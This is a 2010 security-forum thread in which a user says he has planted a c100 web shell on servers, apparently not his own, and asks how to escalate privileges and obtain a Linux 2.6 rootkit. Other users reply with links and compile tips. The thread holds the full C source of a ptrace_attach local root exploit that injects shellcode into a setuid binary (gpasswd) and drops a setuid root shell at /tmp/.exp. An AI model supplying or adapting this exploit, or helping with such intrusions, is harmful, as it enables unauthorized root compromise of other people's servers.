Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
March 28, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 503
Members: 0
Total: 503
PacketStorm News
·301 Moved Permanently

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Shell commands injection -> Now what?
Post new topic  Reply to topic View previous topic :: View next topic 
Now what?
PostPosted: Sun Jan 10, 2010 9:13 am Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




Hi Wink

These days I uploaded c100 on some servers... but there are directories which aren't editable by me. So my question is: how to escalate my privilegies or login as another user?

Please give more details, cause I'm not very good in working with unix systems...
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 10:44 am Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




does anyone have rootkit for 2.6.x linux kernel?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 2:35 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




Quote:
Please give more details, cause I'm not very good in working with unix systems...


+

Quote:
does anyone have rootkit for 2.6.x linux kernel?


Малко тъпо,нали?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 2:40 pm Reply with quote
vince213333
Advanced user
Advanced user
 
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Maybe he's a fast learner, pexli Wink
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 3:18 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




е не, защо да е тъпо? този, който имам нещо не иска да се компилира и за това си търся друг Wink Можеш ли да помогнеш?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 3:34 pm Reply with quote
vince213333
Advanced user
Advanced user
 
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Code:
http://www.enye-sec.org/en/programs.html


3rd one in the list.

Or

Code:
http://seclists.org/dailydave/2008/q3/215


I hope it helps Confused
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 3:36 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




well, I found one, compiled it and tried to run it, but I suppose I didn't do that correct.

Code:

/*
ptrace_attach privilege escalation exploit by s0m3b0dy

[*] tested on Gentoo 2.6.29rc1

grataz:
Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo...

email: s0m3b0dy1 (at) gmail.com
*/

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
char shellcode[] =
"\x6a\x46\x58\x31\xdb\x31\xc9\xcd\x80\xeb\x21\x5f\x6a\x0b\x58\x99"
"\x52\x66\x68\x2d\x63\x89\xe6\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x57\x56\x53\x89\xe1\xcd\x80\xe8\xda\xff\xff\xff"
"echo \"#include <stdio.h>\nmain(){setuid(0);if(getuid()==0) printf(\\\"r00teed!\\n\\\");execv(\\\"/bin/bash\\\",0);return 0;}\" > /tmp/.exp.c;gcc /tmp/.exp.c -o /tmp/.exp;rm /tmp/.exp.c;chmod +s /tmp/.exp;exit;";
struct user_regs_struct322 {
        unsigned long ebx, ecx, edx, esi, edi, ebp, eax;
        unsigned short ds, __ds, es, __es;
        unsigned short fs, __fs, gs, __gs;
        unsigned long orig_eax, eip;
        unsigned short cs, __cs;
        unsigned long eflags, esp;
        unsigned short ss, __ss;
};

main()
{
struct user_regs_struct322  regs;
struct stat buf;
int i,o;
unsigned long * src;
unsigned long * dst;
char *env[2];
env[0]="/usr/bin/gpasswd";  // some suid file
env[1]=0;
if((o=fork()) == 0)
{
execve(env[0],env,0);
exit(0);
}
if(ptrace(PTRACE_ATTACH,o,0,0)==-1)
{
printf("\n[-] Attach\n");
exit(0);
}
 wait((int *)0);
if (ptrace(PTRACE_GETREGS, o, NULL, &regs) == -1){
                printf("\n[-] read registers\n");
      exit(0);
}
printf( "[+] EIP - 0x%08lx\n", regs.eip);
dst= (unsigned long *) regs.eip;
src = (unsigned long *) shellcode;
for(i=0;i<sizeof(shellcode) -1;i+=4)
if (ptrace(PTRACE_POKETEXT, o, dst++, *src++) == -1){
                       printf("\n[-] write shellcode\n");
         exit(0);
}
ptrace(PTRACE_CONT, o, 0, 0);
ptrace(PTRACE_DETACH,o,0,0);
printf("[+] Waiting for root...\n");
sleep(2);
if(!stat("/tmp/.exp",&buf))
{
printf("[+] Executing suid shell /tmp/.exp...\n");
execv("/tmp/.exp",0);
}
else
{
printf("[-] Damn no r00t here :(\n");
}
return 0;
}


When I run it I get this output:

Quote:

Usage: gpasswd [-r|-R] group
gpasswd [-a user] group
gpasswd [-d user] group
gpasswd [-A user,...] [-M user,...] group

[-] Attach


I guess gpasswd is some suid file(I have to give the path to it??). But what are the other parameters? How should I run this exploit correcetly?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 6:52 pm Reply with quote
gat3way
Regular user
Regular user
 
Joined: Dec 11, 2008
Posts: 5




Quote:
http://www.enye-sec.org/en/programs.html


Много интересно...
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:13 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




Vince, do you have any idea how to compile the exploit, that you suggested?
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:23 pm Reply with quote
vince213333
Advanced user
Advanced user
 
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




gat3way wrote:
Quote:
http://www.enye-sec.org/en/programs.html


Много интересно...


Randomly googled Smile

And AIR_Nayden, it seems like C code to me. Based on the use of structures and -1 instead of the boolean "false" etc... Though I don't know that much of this kind of exploits.

Maybe use the programm gcc and try
Code:
gcc -c exploit.c -o nameOfExploitAfterCompiling


I'm just guessing though, there are people on here who know much more of this than I do Confused
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:29 pm Reply with quote
AIR_Nayden
Advanced user
Advanced user
 
Joined: Dec 30, 2009
Posts: 70
Location: Bulgaria




but which filename should I write? THere is more than one .c file Sad
View user's profile Send private message
PostPosted: Sun Jan 10, 2010 7:32 pm Reply with quote
vince213333
Advanced user
Advanced user
 
Joined: Aug 03, 2009
Posts: 737
Location: Belgium




Try looking for the file with the "main" function in it. That's usually the function that is executed first in C.
View user's profile Send private message
Now what?
  www.waraxe.us Forum Index -> Shell commands injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB © 2001-2008 phpBB Group






Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.160 Seconds